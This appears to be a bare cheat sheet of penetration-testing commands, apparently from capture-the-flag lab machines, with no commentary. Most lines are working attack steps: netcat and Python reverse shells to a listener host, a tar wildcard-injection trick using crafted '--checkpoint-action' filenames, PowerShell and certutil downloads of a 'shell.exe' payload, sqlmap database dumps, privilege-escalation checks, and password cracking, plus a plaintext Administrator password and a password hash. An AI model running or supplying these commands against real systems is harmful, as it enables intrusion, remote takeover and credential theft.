python -c 'import pty;pty.spawn("/bin/bash")'


find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print 2>/dev/null

cd /var/www/html
rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.8.6.159 1337 >/tmp/f
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.11.16.134 4443 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.16.134",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

powershell -c "Invoke-WebRequest -Uri 'http://10.11.16.134:8000/shell.exe' -OutFile 'C:\Windows\Temp\Message.exe'"
Import-Module .\PowerUp.ps1
Invoke-AllChecks | Out-File -Encoding ASCII checks.txt


certutil.exe -urlcache -f http://10.11.16.134/Message.exe Message.exe

xfreerdp /u:Administrator /p:4q6XvFES7Fdxs /v:10.10.116.101

sqlmap -u http://10.10.248.56/administrator.php --data="username=admin&password=admin" --method POST -dbs --batch
sqlmap -u http://10.10.248.56/administrator.php --data="username=admin&password=admin" --method POST -D users --dump all --batch


python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.16.134",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

wpscan --url 

resim
steghide info resim.jpg
steghide extract -sf resim.jpg

----

gpg2john file.asc > hash
johnny hash
gpg --import file.asc
gpg --decrypt file.gpg

----

etc/passwd root:none noLaqFFW76azg 
